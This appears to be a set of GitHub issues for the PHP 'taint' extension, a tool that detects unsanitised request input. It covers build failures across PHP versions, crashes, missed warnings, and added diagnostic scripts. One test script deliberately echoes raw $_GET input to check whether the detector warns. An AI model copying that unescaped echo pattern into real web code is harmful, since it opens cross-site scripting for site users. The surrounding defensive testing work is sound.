/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1735:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_pathinfo':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1743:2: error: unknown type name 'zend_string'
zend_string *path;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1744:2: error: unknown type name 'zend_long'
zend_long opt;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1759:30: warning: comparison between pointer and integer [enabled by default]
if (Z_STR_P(return_value) != path && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1760:5: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'OnUpdateErrorLevel':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1773:3: warning: passing argument 1 of 'atoi' makes pointer from integer without a cast [enabled by default]
TAINT_G(error_level) = (int)atoi(ZSTR_VAL(new_value));
^
In file included from /usr/include/features.h:374:0,
from /usr/include/stdlib.h:24,
from /usr/include/php5/main/php_config.h:2418,
from /usr/include/php5/main/php.h:33,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/stdlib.h:278:1: note: expected 'const char *' but argument is of type 'int'
__NTH (atoi (const char *__nptr))
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1807:4: error: unknown type name 'zend_string'
zend_string *str = zend_string_init(Z_STRVAL_P(el), Z_STRLEN_P(el), 0);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1807:23: warning: initialization makes pointer from integer without a cast [enabled by default]
zend_string *str = zend_string_init(Z_STRVAL_P(el), Z_STRLEN_P(el), 0);
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1809:4: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(str);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_untaint':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:44:45: error: lvalue required as left operand of assignment
#define TAINT_CLEAN(str) (GC_FLAGS((str)) &= ~IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1838:4: note: in expansion of macro 'TAINT_CLEAN'
TAINT_CLEAN(Z_STR_P(el));
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zm_activate_taint':
/usr/include/php5/Zend/zend_operators.h:485:29: error: request for member 'type' in something not a structure or union
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1903:6: note: in expansion of macro 'Z_TYPE'
if (Z_TYPE(PG(http_globals)[TRACK_VARS_POST]) == IS_ARRAY) {
^
/usr/include/php5/Zend/zend_operators.h:445:32: error: request for member 'value' in something not a structure or union
#define Z_ARRVAL(zval) (zval).value.ht
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1904:26: note: in expansion of macro 'Z_ARRVAL'
php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_POST]));
^
/usr/include/php5/Zend/zend_operators.h:485:29: error: request for member 'type' in something not a structure or union
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1907:6: note: in expansion of macro 'Z_TYPE'
if (Z_TYPE(PG(http_globals)[TRACK_VARS_GET]) == IS_ARRAY) {
^
/usr/include/php5/Zend/zend_operators.h:445:32: error: request for member 'value' in something not a structure or union
#define Z_ARRVAL(zval) (zval).value.ht
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1908:26: note: in expansion of macro 'Z_ARRVAL'
php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_GET]));
^
/usr/include/php5/Zend/zend_operators.h:485:29: error: request for member 'type' in something not a structure or union
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1911:6: note: in expansion of macro 'Z_TYPE'
if (Z_TYPE(PG(http_globals)[TRACK_VARS_COOKIE]) == IS_ARRAY) {
^
/usr/include/php5/Zend/zend_operators.h:445:32: error: request for member 'value' in something not a structure or union
#define Z_ARRVAL(zval) (zval).value.ht
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1912:26: note: in expansion of macro 'Z_ARRVAL'
php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_COOKIE]));
^
make: *** [taint.lo]error 1

PHP 7.2 compatibility

For now build is refused (Unsupported PHP Version ID)

BTW using 7.1 code works (test suite passes)

-# elif PHP_VERSION_ID < 70200
+# elif PHP_VERSION_ID < 70300
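
Review bot: on the changed `# elif PHP_VERSION_ID < 70300` line, widening the bound routes 7.2 builds into the code written for 7.1, and the post reports one test failing on the each() deprecation notice; that test should be updated in the same change (for example by replacing each() with foreach) so the suite passes on 7.2. A short comment beside the condition saying that 7.2 deliberately reuses the 7.1 code would document the intent.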

Only 1 broken test because of "Deprecated: The each() function is deprecated."

What about allowing 7.2 ?

composer doesn't work

Composer does not work. It outputs nothing when I enter any composer command if taint.enable=1. It took me hours to find the problem.

proto string implode(string $separator, array $args)

PHP_FUNCTION(taint_implode) : #L2377
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "zz", &op1, &op2) == FAILURE) {
ZVAL_FALSE(return_value);
WRONG_PARAM_COUNT;
}

"zz" is not quite the same as "implode" in the PHP source.

PHP 7.1 build

/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c: In function 'php_taint_binary_assign_op_helper':
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:774:33: error: 'EXT_TYPE_UNUSED' undeclared (first use in this function)
  if ((!((opline)->result_type & EXT_TYPE_UNUSED))) {
                                 ^
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:774:33: note: each undeclared identifier is reported only once for each function it appears in
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c: In function 'php_taint_binary_assign_op_obj_helper':
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:811:36: error: 'EXT_TYPE_UNUSED' undeclared (first use in this function)
     if ((!((opline)->result_type & EXT_TYPE_UNUSED))) {
                                    ^
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c: In function 'php_taint_binary_assign_op_dim_helper':
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:883:32: error: 'EXT_TYPE_UNUSED' undeclared (first use in this function)
    if ((opline)->result_type & EXT_TYPE_UNUSED) {
                                ^

build errors with clang in OS X against php 7.0-rc7

MacBook-Pro:php-taint ~$ make
/bin/sh /Users/chris/projects/php-taint/libtool --mode=compile cc  -I. -I/Users/chris/projects/php-taint -DPHP_ATOM_INC -I/Users/chris/projects/php-taint/include -I/Users/chris/projects/php-taint/main -I/Users/chris/projects/php-taint -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/main -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/TSRM -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext/date/lib  -DHAVE_CONFIG_H  -g -O2   -c /Users/chris/projects/php-taint/taint.c -o taint.lo 
mkdir .libs
 cc -I. -I/Users/chris/projects/php-taint -DPHP_ATOM_INC -I/Users/chris/projects/php-taint/include -I/Users/chris/projects/php-taint/main -I/Users/chris/projects/php-taint -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/main -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/TSRM -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /Users/chris/projects/php-taint/taint.c  -fno-common -DPIC -o .libs/taint.o
/Users/chris/projects/php-taint/taint.c:125:58: error: too many arguments to function call, expected 2, have 3
                if (zend_hash_get_current_data_ex(ht, (void**)&ppzval, &pos) == FAILURE) {
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                      ^~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_hash.h:171:1: note: 'zend_hash_get_current_data_ex' declared here
ZEND_API zval* ZEND_FASTCALL zend_hash_get_current_data_ex(HashTable *ht, HashPosition *pos);
^
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/main/php_config.h:6:19: note: expanded from macro 'ZEND_API'
# define ZEND_API __attribute__ ((visibility("default")))
                  ^
/Users/chris/projects/php-taint/taint.c:128:13: warning: implicit declaration of function 'Z_TYPE_PP' is invalid in C99
      [-Wimplicit-function-declaration]
        if (Z_TYPE_PP(ppzval) == IS_ARRAY) {
            ^
/Users/chris/projects/php-taint/taint.c:131:4: warning: implicit declaration of function 'Z_STRVAL_PP' is invalid in C99
      [-Wimplicit-function-declaration]
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                        ^
/Users/chris/projects/php-taint/taint.c:131:56: warning: implicit declaration of function 'Z_STRLEN_PP' is invalid in C99
      [-Wimplicit-function-declaration]
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                                                                            ^
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_alloc.h:167:51: note: expanded from macro 'erealloc'
#define erealloc(ptr, size)                                     _erealloc((ptr), (size) ZEND_FILE_LINE_CC ZEND_FILE_LINE_EMPTY_CC)
                                                                                  ^
/Users/chris/projects/php-taint/taint.c:131:26: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'void *'
      [-Wint-conversion]
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                                              ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_alloc.h:167:43: note: expanded from macro 'erealloc'
#define erealloc(ptr, size)                                     _erealloc((ptr), (size) ZEND_FILE_LINE_CC ZEND_FILE_LINE_EMPTY_CC)
                                                                          ^~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_alloc.h:80:47: note: passing argument to parameter 'ptr' here
ZEND_API void*  ZEND_FASTCALL _erealloc(void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) ZEND_ATTRIBUTE_ALLOC_SIZE(2);
                                              ^
/Users/chris/projects/php-taint/taint.c:131:24: error: expression is not assignable
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                        ~~~~~~~~~~~~~~~~~~~ ^
/Users/chris/projects/php-taint/taint.c:140:9: warning: implicit declaration of function 'Z_UNSET_ISREF_P' is invalid in C99
      [-Wimplicit-function-declaration]
        Z_UNSET_ISREF_P(z);
        ^
/Users/chris/projects/php-taint/taint.c:154:9: warning: implicit declaration of function 'safe_free_zval_ptr' is invalid in C99
      [-Wimplicit-function-declaration]
        safe_free_zval_ptr(z);
        ^
/Users/chris/projects/php-taint/taint.c:162:4: warning: implicit declaration of function 'Z_SET_ISREF_P' is invalid in C99
      [-Wimplicit-function-declaration]
                        Z_SET_ISREF_P(z);
                        ^
/Users/chris/projects/php-taint/taint.c:167:38: error: unknown type name 'zend_compiled_variable'; did you mean 'zend_compiler_globals'?
static void php_taint_get_cv_address(zend_compiled_variable *cv, zval ***ptr, temp_variable *Ts TSRMLS_DC) /* {{{ */ {
                                     ^~~~~~~~~~~~~~~~~~~~~~
                                     zend_compiler_globals
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:25:39: note: 'zend_compiler_globals' declared here
typedef struct _zend_compiler_globals zend_compiler_globals;
                                      ^
/Users/chris/projects/php-taint/taint.c:167:79: error: unknown type name 'temp_variable'
static void php_taint_get_cv_address(zend_compiled_variable *cv, zval ***ptr, temp_variable *Ts TSRMLS_DC) /* {{{ */ {
                                                                              ^
/Users/chris/projects/php-taint/taint.c:171:2: warning: implicit declaration of function 'zend_hash_quick_update' is invalid in C99
      [-Wimplicit-function-declaration]
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
        ^
/Users/chris/projects/php-taint/taint.c:171:54: error: no member named 'name' in 'struct _zend_compiler_globals'
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                                        ~~  ^
/Users/chris/projects/php-taint/taint.c:171:64: error: no member named 'name_len' in 'struct _zend_compiler_globals'
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                                                  ~~  ^
/Users/chris/projects/php-taint/taint.c:171:80: error: no member named 'hash_value' in 'struct _zend_compiler_globals'
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                                                                  ~~  ^
/Users/chris/projects/php-taint/taint.c:171:28: error: no member named 'active_symbol_table' in 'struct _zend_executor_globals'; did you mean
      'valid_symbol_table'?
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                  ^~~~~~~~~~~~~~~~~~~
                                  valid_symbol_table
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:46:34: note: expanded from macro 'EG'
# define EG(v) (executor_globals.v)
                                 ^
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals.h:212:12: note: 'valid_symbol_table' declared here
        zend_bool valid_symbol_table;
                  ^
/Users/chris/projects/php-taint/taint.c:176:9: error: no member named 'This' in 'struct _zend_executor_globals'
        if (EG(This)) {
            ~~~^~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:46:34: note: expanded from macro 'EG'
# define EG(v) (executor_globals.v)
                                 ^
/Users/chris/projects/php-taint/taint.c:177:14: error: no member named 'This' in 'struct _zend_executor_globals'
                return &EG(This);
                        ~~~^~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:46:34: note: expanded from macro 'EG'
# define EG(v) (executor_globals.v)
                                 ^
/Users/chris/projects/php-taint/taint.c:186:32: error: use of undeclared identifier 'IS_BOOL'
                || (Z_TYPE_PP(object_ptr) == IS_BOOL && Z_LVAL_PP(object_ptr) == 0)
                                             ^
/Users/chris/projects/php-taint/taint.c:186:43: warning: implicit declaration of function 'Z_LVAL_PP' is invalid in C99
      [-Wimplicit-function-declaration]
                || (Z_TYPE_PP(object_ptr) == IS_BOOL && Z_LVAL_PP(object_ptr) == 0)
                                                        ^
/Users/chris/projects/php-taint/taint.c:191:3: warning: incompatible pointer types initializing 'zval *' (aka 'struct _zval_struct *') with an
      expression of type 'zval **' (aka 'struct _zval_struct **'); dereference with * [-Wincompatible-pointer-types]
                SEPARATE_ZVAL_IF_NOT_REF(object_ptr);
                ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_types.h:967:9: note: expanded from macro 'SEPARATE_ZVAL_IF_NOT_REF'
                zval *_zv = (zv);                                                               \
                      ^     ~~~~
/Users/chris/projects/php-taint/taint.c:487:42: error: unknown type name 'zend_uint'
static zval * php_taint_get_zval_ptr_var(zend_uint var, const temp_variable *Ts, taint_free_op *should_free TSRMLS_DC) /* {{{ */ {
                                         ^
/Users/chris/projects/php-taint/taint.c:487:63: error: unknown type name 'temp_variable'
static zval * php_taint_get_zval_ptr_var(zend_uint var, const temp_variable *Ts, taint_free_op *should_free TSRMLS_DC) /* {{{ */ {
                                                              ^
/Users/chris/projects/php-taint/taint.c:488:14: error: expected expression
        zval *ptr = TAINT_TS(var).var.ptr;
                    ^
./php_taint.h:124:44: note: expanded from macro 'TAINT_TS'
#define TAINT_TS(offset) (*(temp_variable *)((char *)Ts + offset))
                                           ^
/Users/chris/projects/php-taint/taint.c:488:14: error: use of undeclared identifier 'temp_variable'
./php_taint.h:124:29: note: expanded from macro 'TAINT_TS'
#define TAINT_TS(offset) (*(temp_variable *)((char *)Ts + offset))
                            ^
/Users/chris/projects/php-taint/taint.c:493:41: error: unknown type name 'zend_uint'
static zval * php_taint_get_zval_ptr_cv(zend_uint var, int type TSRMLS_DC) /* {{{ */ {
                                        ^
/Users/chris/projects/php-taint/taint.c:494:17: error: no member named 'CVs' in 'struct _zend_execute_data'
        zval ***ptr = &TAINT_CV_OF(var);
                       ^~~~~~~~~~~~~~~~
./php_taint.h:120:55: note: expanded from macro 'TAINT_CV_OF'
#define TAINT_CV_OF(i)     (EG(current_execute_data)->CVs[i])
                            ~~~~~~~~~~~~~~~~~~~~~~~~  ^
/Users/chris/projects/php-taint/taint.c:497:3: error: use of undeclared identifier 'zend_compiled_variable'
                zend_compiled_variable *cv = &TAINT_CV_DEF_OF(var);
                ^
/Users/chris/projects/php-taint/taint.c:497:27: error: use of undeclared identifier 'cv'
                zend_compiled_variable *cv = &TAINT_CV_DEF_OF(var);
                                        ^
fatal error: too many errors emitted, stopping now [-ferror-limit=]
10 warnings and 20 errors generated.
make: *** [taint.lo] Error 1

Support for newer PHP versions

Any hopes for support on newer php versions, like 5.5, 5.6? This is an awesome extension, but we really can't use it on our up-to-date server :(

It doesn't work in most cases from your example

<?php
ini_set('taint.enable', 'On');
ini_set('taint.error_level', E_WARNING);
ini_set('display_errors' , 1);
error_reporting(E_ALL);

$a = trim($_GET['a']);
$output    = "Welcome, {$a} !!!";
$var       = "output";
//№1
echo $a; // Warning;
//№2
echo $output; //NO WARNING;
//№3
echo $$var; //NO WARNING;

Expected:
3 Warnings, one warning for each case (№1, №2, №3)
Actual:
1 Warning, only for №1

Environment:
php -v

PHP 7.1.22 (cli) (built: Sep 15 2018 03:54:08) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.1.22, Copyright (c) 1999-2018, by Zend Technologies
    with Xdebug v2.5.5, Copyright (c) 2002-2017, by Derick Rethans
    with blackfire v1.23.0~linux-x64-non_zts71, https://blackfire.io, by Blackfire

cat /etc/issue

Debian GNU/Linux 8 \n \l

PHP 7.2.6 SIGSEGV

Not sure how to debug this, but when Taint is enabled, the following causes problems:

<?php
    echo substr('abc', 0, 2);
?>

I'm wondering if this might have something to do with the op-code cache... as it works when it's using something that's variable (e.g. rand())... and it often works the first time it's run (but not always).

My current setup includes:

  • PHP 7.2.6, using php-fpm, on MacOS 10.13.5, using:

      brew install httpd24 --with-privileged-ports --with-http2
      brew install php72 --with-pear --with-fpm --with-homebrew-curl
    
  • Taint 2.0.4, installed via pecl install taint

And when running it from the command line, it's fine:

/usr/local/bin/php -f index.php
ab

The logs include:

/usr/local/var/log/php-fpm.log

[06-Jun-2018 16:49:10] WARNING: [pool www] child 22475 exited on signal 11 (SIGSEGV) after 3.296677 seconds from start
[06-Jun-2018 16:49:10] NOTICE: [pool www] child 22478 started

/private/var/log/apache2/error_log

[Wed Jun 06 16:49:10.121028 2018] [proxy_fcgi:error] [pid 21745:tid 123145330524160] [client 10.211.55.2:55360] AH01067: Failed to read FastCGI header
[Wed Jun 06 16:49:10.121247 2018] [proxy_fcgi:error] [pid 21745:tid 123145330524160] (54)Connection reset by peer: [client 10.211.55.2:55360] AH01075: Error dispatching request to :

/private/var/log/apache2/access_log

10.211.55.2 - - [-] [-] [2018-06-06 16:49:10] "GET / HTTP/2.0" 503 299 "-" "curl/7.54.0"

And the php.log is empty.


I assume it's un-related, but the script:

<?php
    echo substr(rand(1, 2), 0, 2);
?>

Won't complain when rand() returns 2, but does when it returns 1:

<br />
<b>Warning</b>:  main() [echo]: Attempt to echo a string that might be tainted in <b>.../index.php</b> on line <b>2</b><br />
1

compatibility with PHP 5.3.3

PHP version 5.3.3 is the version that ships with Redhat Enterprise Linux 6 and CentOS 6.

make test will return the following on these systems:

Warning: PHP Startup: Unable to load dynamic library '/usr/local/src/taint-1.2.2/modules/taint.so' - /usr/local/src/taint-1.2.2/modules/taint.so: undefined symbol: INIT_PZVAL_COPY in Unknown on line 0

and compared to a php 5.4 installation, INIT_PZVAL_COPY is truly not defined in /usr/include/php/Zend/zend.h.

Is there any way to get taint working with the php version shipped by RHEL/CentOS?

doesn't work with xdebug enabled

I am running php7.0.14 on ubuntu 14 and taint doesn't output any warnings when xdebug is loaded at the same time.

Disabling the xdebug extension results in warnings being printed.

I am testing with the very simple example from the readme.
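For the two reports above (missing warnings for interpolated strings and variable variables, and no warnings while xdebug is loaded), the following is an added diagnostic, not code from the taint project or from either reporter. It prints the effective configuration of the SAPI that serves the request and uses the extension's `is_tainted()` function to inspect the taint mark directly. The expected values follow the README's usage example; the file name `taint_check.php` and the literal control string are assumptions.

```php
<?php
// Added diagnostic, not part of the taint project. Request it through the
// SAPI that misbehaves with a non-empty parameter: /taint_check.php?a=x
header('Content-Type: text/plain');

// Effective settings, plus the extensions named in the two reports.
$env = [
    'php'               => PHP_VERSION,
    'sapi'              => PHP_SAPI,
    'taint loaded'      => extension_loaded('taint'),
    'taint.enable'      => ini_get('taint.enable'),
    'taint.error_level' => ini_get('taint.error_level'),
    'xdebug loaded'     => extension_loaded('xdebug'),
    'opcache loaded'    => extension_loaded('Zend OPcache'),
    'blackfire loaded'  => extension_loaded('blackfire'),
];
foreach ($env as $name => $value) {
    printf("%-18s %s\n", $name, var_export($value, true));
}

if (!function_exists('is_tainted')) {
    exit("is_tainted() is missing: taint is not loaded in this SAPI\n");
}
if (!isset($_GET['a']) || !is_string($_GET['a']) || trim($_GET['a']) === '') {
    exit("pass a non-empty ?a= value to test propagation\n");
}

// The derivations from the report, each kept in a variable so the taint
// mark can be inspected directly instead of inferred from echo warnings.
$raw     = $_GET['a'];
$a       = trim($raw);
$output  = "Welcome, {$a} !!!";
$var     = 'output';
$viaVar  = $$var;
$path    = '/tmp' . $a;
$literal = 'constant text';   // negative control: never came from a request

$checks = [
    'raw $_GET value'   => [is_tainted($raw), true],
    'after trim()'      => [is_tainted($a), true],
    'interpolation'     => [is_tainted($output), true],
    'variable variable' => [is_tainted($viaVar), true],
    'concatenation'     => [is_tainted($path), true],
    'literal control'   => [is_tainted($literal), false],
];
foreach ($checks as $name => $pair) {
    list($actual, $expected) = $pair;
    printf("%-18s tainted=%-5s %s\n", $name, var_export($actual, true),
        $actual === $expected ? 'ok' : 'MISMATCH');
}
```

Comparing the output with xdebug loaded and unloaded separates two cases: the mark being lost during propagation, and the mark being present while the warning at the sink is not raised.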

Use valid identifier for taint/untaint() varargs in ReflectionParameter->getName() instead of `$...`

taint/taint.c

Lines 37 to 45 in 2deabd5

ZEND_BEGIN_ARG_INFO_EX(taint_arginfo, 0, 0, 1)
ZEND_ARG_INFO(1, string)
ZEND_ARG_INFO(1, ...)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(untaint_arginfo, 0, 0, 1)
ZEND_ARG_INFO(1, string)
ZEND_ARG_INFO(1, ...)
ZEND_END_ARG_INFO()

Observed: ... used as the getName()
Desired: args or some other valid php identifier for a variable name

This would be equivalent to function taint($string, $...), where ... is not a valid php identifier and it would be impossible for a user-defined function to use ... as a parameter name.

The use of an invalid identifier may cause issues for tools/IDEs/scripts that extract argument names from Reflection information.

(For https://wiki.php.net/rfc/named_params , the argument names of variadics don't actually matter, but tooling being able to extract valid identifiers from extensions is convenient)

(I'm currently working on checking dozens of extensions' reflection information for consistency with other sources of type/parameter names)
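The consistency check described in this report can be reproduced with PHP's Reflection API. The script below is an added example, not code from the taint project or from the reporter; the function name `invalid_param_names()` is hypothetical, and it inspects only an extension's functions, not its classes.

```php
<?php
// Added example: flag parameter names exposed through Reflection that are
// not valid PHP identifiers, for every function of one loaded extension.

function invalid_param_names($extension)
{
    if (!extension_loaded($extension)) {
        throw new RuntimeException("extension '$extension' is not loaded");
    }
    // Pattern for a valid variable name, as given in the PHP manual.
    $identifier = '/^[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff]*$/';

    $findings = [];
    $ext = new ReflectionExtension($extension);
    foreach ($ext->getFunctions() as $fn) {
        foreach ($fn->getParameters() as $param) {
            if (preg_match($identifier, $param->getName())) {
                continue;
            }
            $findings[] = [
                'function'  => $fn->getName(),
                'position'  => $param->getPosition(),
                'name'      => $param->getName(),
                'by_ref'    => $param->isPassedByReference(),
                'variadic'  => $param->isVariadic(),
            ];
        }
    }
    return $findings;
}

// Usage: php check_params.php [extension]   (defaults to taint)
$target = isset($argv[1]) ? $argv[1] : 'taint';
try {
    $findings = invalid_param_names($target);
} catch (RuntimeException $e) {
    fwrite(STDERR, $e->getMessage() . "\n");
    exit(2);
}
foreach ($findings as $f) {
    printf("%s(): parameter #%d is named %s (by_ref=%s, variadic=%s)\n",
        $f['function'], $f['position'], var_export($f['name'], true),
        var_export($f['by_ref'], true), var_export($f['variadic'], true));
}
exit($findings ? 1 : 0);
```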
